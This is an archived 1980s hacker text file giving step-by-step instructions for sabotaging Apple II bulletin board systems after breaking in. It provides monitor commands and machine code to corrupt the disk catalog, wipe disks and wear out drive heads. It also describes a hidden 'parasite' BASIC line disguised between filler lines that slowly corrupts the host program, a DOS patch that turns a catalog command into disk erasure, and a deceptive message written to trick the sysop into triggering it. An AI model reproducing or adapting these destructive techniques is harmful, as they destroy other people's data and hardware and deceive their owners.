home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / bbs / crashem.ana < prev    next >
Encoding:
Text File  |  2003-06-11  |  8.7 KB  |  247 lines

  1.    WHAT TO DO WHEN YOU BREAK INTO A BBS
  2.    ====================================
  3.  
  4.           BY
  5.  
  6.      -=> DOCTOR CRUNCH <=-
  7.  
  8.  
  9.   OK, YOU PROBABLY HAVE READ T-FILES ABOUT HOW TO BREAK IN A BBS.  SO, I WILL
  10. TELL YOU WHAT TO DO WHEN YOU GET INTO THE BBS.    MOST SYSOPS, IF THEY HAVE AN IQ,
  11. WILL DISABLE THE INIT COMMAND.    THEY USUALLY DO THIS BY CHANGING THE INIT
  12. COMMAND TO SOME OTHER WORD YOU WILL NEVER GUESS.  WELL, THERE IS AN EASIER WAY
  13. TO CRASH THE BBS THAN BY SEARCHING FOR WHAT THE SYSOP CHANGED IT TO.  GET IN THE
  14. MONITER (CALL-151), AND TYPE:
  15.  
  16.       A54FG
  17.  
  18.   THIS IS THE INIT COMMAND'S ENTRY POINT WHICH DOS CALLS TO INITIALIZE A DISK.
  19. THERE ARE SOME BUGS WITH THIS WAY OF CRASHING A DISK THOUGH:
  20.  
  21.   1) IT TAKES ABOUT 40 SECONDS TO INIT A DISK, AND 9F A SYSOP IS THERE, HE CAN
  22. STOP YOU AT ANY TIME.
  23.  
  24.   2) MANY BOARDS USE A FAST DOS; AND, MOST FAST-DOSES HAD TO TAKE OUT THE INIT
  25. COMMAND TO MAKE THE MODS TO DOS.  SO, EVEN IF YOU DO A A54FG, YOU WON'T BE ABLE
  26. TO KILL THE DISK.
  27.  
  28.   I PREFER TO KILL THE VTOC, INSTEAD OF INITING THE DISK.  HERE ARE A COUPLE OF
  29. REASONS WHY:
  30.  
  31.    1) VERY QUICK!!!!!
  32.  
  33.    2) VERY NASTY!!!!!
  34.  
  35.   THE TRICK IS TO REWRITE THE VTOC (VOLUME TABLE OF CONTENTS) TO SAY THAT THE
  36. CATALOG TRACK IS 255.  NOW ALL OF US KNOW THERE IS NO TRACK 255 ON A DISK, THIS
  37. CAN ONLY MEAN.....(YOU GUESSED IT) THAT THE SYSTEM WILL BOMB WHEN DOING ANYTHING
  38. THAT INVOLVES LOOKING AT THE CATALOG TRACK.  SINCE ALMOST EVERYTHING YOU CAN DO
  39. IN DOS INVOLVES READING THE CATALOG TRACK, THIS WILL CRASH THE BBS QUITE WELL.
  40. AND HERE IS A NICE LITTLE CATCH, YOU CAN REBOOT HIS DISK (WHICH WILL GIVE HIM AN
  41. I/O ERROR BECAUSE WHEN THE HELLO FILE IS RUN, DOS MUST LOOK AT THE CATALOG
  42. TRACK) AND LOGOFF AT THE SAME TIME.  YOU SHOULD ALWAYS LOGOFF QUICKLY SO THAT
  43. THE SYSOP CAN'T LIFT UP THE PHONE, WHICH SOMETIMES WILL PREVENT YOU FROM HANGING
  44. UP.  THE WAY I LOGOFF IS THE MAKE THE BBS I JUST CRASHED DO A RESET, CAUSING ME
  45. TO BE DISCONNECTED FROM THE OTHER END OF THE LINE.  SINCE MOST TERMINAL PROGRAMS
  46. HANG UP IF YOU LOOSE THE CARRIER (WHICH WILL HAPPEN WHEN HIS SYSTEM RESETS), YOU
  47. WILL HANG UP THE SECOND YOU CRASH HIS SYSTEM!!!!
  48.  
  49.  WELL, HERE IT IS:
  50.  
  51.   (BE SURE YOU'RE IN THE MONITER)
  52.  
  53.   *B3BC:FF NAFFBG 3F4:00 NFA62G
  54.  
  55.  IF YOU DON'T WANT TO LOGOFF,
  56.  
  57.   *B3BC:FF NAFFBG
  58.  
  59.   NOTE:  SOMETIMES YOU MAY HEAR A BEEP, THEN ALL OF YOUR MONITER COMMANDS WILL
  60. FAIL.  THIS IS BECAUSE OF A BUG IN DOS.  WHEN RWTS LETS GO OF CONTROL, THE
  61. MONITER VARIBLE $48 IS DESTROYED.  TO WORK PROPERLY, $48 MUST BE RESTORED TO 0
  62. BEFORE THE MONITER TAKES CONTROL AGAIN.  I MADE A SHORT ROUTINE THAT WHEN
  63. CALLED, WRITES THE VTOC BUFFER TO THE DISK, AND SETS $48 TO 0.    THE ROUTINE IS:
  64.  
  65.        300- 20 FB AF  JSR $AFFB
  66.        302- A9 00     LDA #$00
  67.        304- 85 48     STA $48
  68.        306- 60        RTS
  69.  
  70.   SOMETIMES IT IS DESIRABLE TO CRASH THE DISKS IN DRIVE 1 AND DRIVE 2.    THIS CAN
  71. BE DONE IN 1 LINE, INCLUDING THE QUICK LOGOFF:
  72.  
  73.   *300:20 FB AF A9 00 85 48 60 N B3BC:FF NB5F8:1 (DRV1) N300G B5F8:2 N300G
  74. 3F4:FF N FA62G
  75.  
  76.   WELL, THAT'S ALL FOLKS!!!
  77.  
  78.  
  79.  HAVE LOTS OF FUN......
  80.  
  81.     ==============
  82.     3>DR. CRUNCH<+
  83.     ==============
  84.  
  85.  
  86.   -=*> P.S.  I WAS MESSING AROUND WITH DOS A COUPLE OF DAYS AGO AND I FIGURED
  87. OUT A REAL, REAL, REAL, NASTY ONE.  YOU HAVE PROBABLY HEARD OF LETTING THE DRIVE
  88. SPIN FOR A COUPLE OF DAYS TO RUIN IT.  THIS WORX, BUT IT TAKES A LONG TIME...  I
  89. LIKE THIS 1 BETTER:
  90.  
  91.      *BDCC:EA EA NBDDA:EA EA
  92.  
  93.   THIS MODS DOS TO RECALIBRATE THE DRIVE HEAD FOREVER (UNLESS THE SYSOP WALKS
  94. IN).  SO, ALL YOU DO NOW IS USE A DOS COMMAND THAT READS THE DISK, AND THE DRIVE
  95. IS GOING TO MAKE ALOT OF FUNNY SOUNDS!    CATALOG IS THE BEST ONE TO USE, SINCE IT
  96. IS IN ALMOST EVERY DOS UNMODIFIED.
  97.  
  98. =====
  99. NOTE: THIS SHOULD ONLY BE DONE WHEN
  100. ===== THERE IS A VERY, VERY, GOOD REASON TO WASTE SOME DUDES DRIVE.  DON'T
  101. EVER DO THIS AS A PRANK, BECAUSE IT WORKS!
  102.  
  103.  
  104.  ZATZ IT..
  105.  
  106.     )>DR. CRUCH<(
  107.  
  108. <<Uploaded by de Bug>>
  109.   ^^^^^^^^ ^^ ^^ ^^^
  110. /\_________________________________________________________________________/\
  111. \/                                       \/
  112.  
  113.      BBS CRASHING: MORE NIFTY TRIX
  114.      *****************************
  115.      *         BY DR. CRUNCH     *
  116.      *>-------------------------<*
  117.      *) TYPED AND UPLOADED FOR: (*
  118.      *)   THE ASSASSIN'S KNOT   (*
  119.      *>-------------------------<*
  120.      *STONEHENGE(814)237-5635  *
  121.      *****************************
  122.      BBS CRASHING: MORE NIFTY TRIX
  123.  
  124.   WELL, I HAD SUCH A FUN TYME PUTTING NIFTY STUFF IN MY LAST T-FILE, I DECIDED
  125. TO DO IT AGAIN.  IN THIS FILE I WILL DISCUSS THE TYME BOMB, THE SNEAKY SPUD, AND
  126. THE BUGGER.  THEY ALL ARE GREAT FOR REVENGE, GETTING EVEN, AND JUST BEING A PAIN
  127. IN THE A$$.  WELL, I WON'T KEEP YOU SUSPENDED ANYMORE, HERE THEY ARE!
  128.  
  129. TYME BOMB
  130. =========
  131.   THIS CRASH TAKES A LONG TIME TO WORK, BUT THERE IS ALMOST NO WAY TO DETECT IT.
  132. IT INVOLVES ADDING A LINE IN A COMMON USED PLACE, BUT NOT TOO COMMON.  THAT
  133. MEANS, THE G-FILE SECTION OF A BBS IS A GOOD PLACE, BUT THE MAIN MENU IS NOT.
  134. ONCE YOU HAVE DECIDED WHERE TO PUT IT, FIND TWO FAT LINES IN THAT AREA.  THESE
  135. LINES WILL BE THE DISGUISE LINES.  YOU WILL PLACE A LINE BETWEEN THEM, AND THEY
  136. WILL CAMOUFLAGE IT (HOPEFULLY).  NOW INSERT THIS LINE RIGHT AFTER THE FIRST
  137. DISGUISE LINE, AND BEFORE THE SECOND.
  138.  
  139. LIKE THIS:
  140.  
  141.   10130 XXXXXXXX DISGUISE LINE XXXXXX
  142.   10134 POKE INT(RND(1)*30000)+2053,0
  143.   10140 XXXXXXXX DISGUISE LINE XXXXXX
  144.  
  145.   THIS WILL, EVERY TIME IT HITS LINE 10134, POKE A RANDOM BYTE IN THE PROGRAM TO
  146. 0.  ALL OF YOU APPLESOFT HACKERS OUT THERE SHOULD REMEMBER THAT APPLESOFT USES
  147. THE BYTE 0 TO SIGNAL THE END OF A LINE; MEANING:  THE ENDS OF SOME LINES WILL
  148. START TO DISAPEAR.  I PARTICULARLY LIKE THIS LITTLE TRICK BECUZ WHEN BUGS DO
  149. APPEAR IN THE PROG- RAM, THEY ARE ALMOST NEVER NEAR THE LINE WE INSERTED.  THE
  150. BUGS APPEAR SO SLOWLY THAT, BY THE TIME THEY ARE DISCOVERED, A BACKUP OF THE BBS
  151. PROGRAM CONTAINING OUR LITTLE LINE HAS USUALLY BEEN MADE.  SO, WHEN THE SYSOP
  152. BEGINS TO USE HIS BACKUP COPY, OUR LITTLE BUG WILL AGAIN BEGIN TO GNAW AWAY AT
  153. THE HOST PROGRAM.
  154.  
  155.   NOW LETS GET SOME TERMS DOWN.
  156.  
  157.   A CRASH THAT IS INSERTED IN THE BBS AND SLOWLY DESTROYS IT IS CALLED A
  158. PARASITE.
  159.  
  160.   THE PROGRAM THE PARASITE IS KILLING IS CALLED THE HOST PROGRAM.
  161.  
  162.   (SOUNDS LIKE BIOLOGY, EH?)
  163.  
  164. STEP BY STEP:
  165.  
  166.   1) GET INTO THE BBS SOMEHOW
  167.  
  168.   2) FIND A COMMONLY USED PLACE, BUT NOT TOO COMMON.
  169.  
  170.   3) INSERT THE PARASITE LINE BETWEEN TWO DISGUISE LINES.
  171.  
  172.   4)>BE SURE TO SAVE THE HOST PROGRAM AFTER THE PARASITE HAS BEEN PUT IN IT!  IF
  173. YOU DON'T, WHEN THE HOST PROGRAM'S COMPUTER IS TURNED OFF, THE PARASITE WILL BE
  174. LOST.
  175.  
  176.   ======================================
  177.  
  178. SNEAKY SPUD
  179.  
  180.   WHO WOULD A SYSOP LEAST EXPECT TO CRASH HIS BOARD?  HIMSELF!    THIS LITTLE
  181. CRASH INVOLVES MODIFYING DOS SO THAT WHEN THE DRIVE IS CATALOGED THE DISK IS
  182. INITIALIZED INSTEAD.  NOW YOU COULD, YOURSELF, INITIALIZE THE DISK, BUT IT IS
  183. MUCH MORE FUN TO LET THE SYSOP DO IT FOR HIMSELF.  WHY?
  184.  
  185.   1) HE CAN'T FIND OUT WHO DID IT.  2) IF HE CRASHES HIS OWN BBS, HE WILL MAKE
  186. HIMSELF A COMPLETE ASS, AND YOU TORMENT HIM WITH THAT INFORMATION UNTIL HE
  187. CRIES!
  188.  
  189.   LETS SEE HOW THIS DONE.
  190.  
  191.    1) GET INTO THE MONITER.
  192.  
  193.    2) TYPE "A56E:4C 4F A5<CR>"
  194.  
  195.    3) EXIT TO BASIC (3D0G)
  196.  
  197.   4) RERUN THE PROGRAM SO IT WILL LOG YOU OFF.
  198.  
  199.   5) CALL THE BOARD BACK AND LOGON NEW UNDER SOME NAME LIKE:  THE TIDY BOWL MAN
  200. OR FAT ALBERT OR UTAH JACK OR (WHO GIVES A DAMN?).
  201.  
  202.   6) SEND HIM SOME FEEDBACK THAT WILL MAKE HIM CATALOG THE DISK.  SUCH AS:
  203.  
  204.   EVERYTIME I TRY TO POST OR SEND MAIL TO A USER I GET THIS MESSAGE THEN I GET
  205. LOGGED OFF!  I'M NOT SURE, BUT I THINK THAT YOUR DRIVE IS FULL.  TO BE ON THE
  206. SAFE SIDE, TAKE A CATALOG OF THEM AND SEE IF THERE ARE MORE THAN 122 FILES.
  207. EVEN THOUGH YOU MAY HAVE FREE SECTOS, YOU MAY NOT HAVE ENOUGH ROOM IN THE
  208. CATALOG FOR MORE FILE NAMES.
  209.  
  210.   I HOPE YOU GET IT FIXED SOON!
  211.  
  212.   LAT0R0N MAN,
  213.  
  214. S P U D  P E A L E R
  215. =======  ===========
  216.  
  217.    7) LOGOFF.
  218.  
  219.   NOW WHEN HE SEES YOUR MESSAGE AND TAKES A CATALOG HE WILL GET HIS DISK FRIED.
  220. HE WILL PROBABLY BE ABLE TO HIT RESET BEFORE THE DISK IS INITED COMPLETELY, BUT
  221. ENOUGH WILL BE ERASED TO SCREW HIM UP.
  222.  
  223.  ======================================
  224.  
  225. THE BUGGER
  226.  
  227.   THIS ONE IS EASY.  LOG ONTO A BOARD THAT IS EASY TO BREAK INTO AND DELETE SOME
  228. LINES OF YOUR CHOICE.  THEN SAVE IT.  DO THIS EVERY DAY OR SO FOR A MONTH.  AT
  229. THE END OF THE MONTH THE SYSOP WILL BE IN THE RUBBER ROOM SINGING JINGLE BELLS
  230. WHILE PLAYING A GAME OF HOPSCOTCH.
  231.  
  232.  ======================================
  233.  
  234.   WELL, THAT WRAPS UP ANOTHER EXCITING EPISODE OF "CRASHING CHRONICLES".
  235.  
  236.  
  237.  ZATZ ALL!
  238.  
  239.  
  240.     )>DR. CRUNCH<(
  241.  
  242.     THE ELIMINATOR
  243.  
  244. <<*UPLOADED BY DE BUG*>>
  245.    ^^^^^^^^ ^^ ^^ ^^^
  246. Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
  247.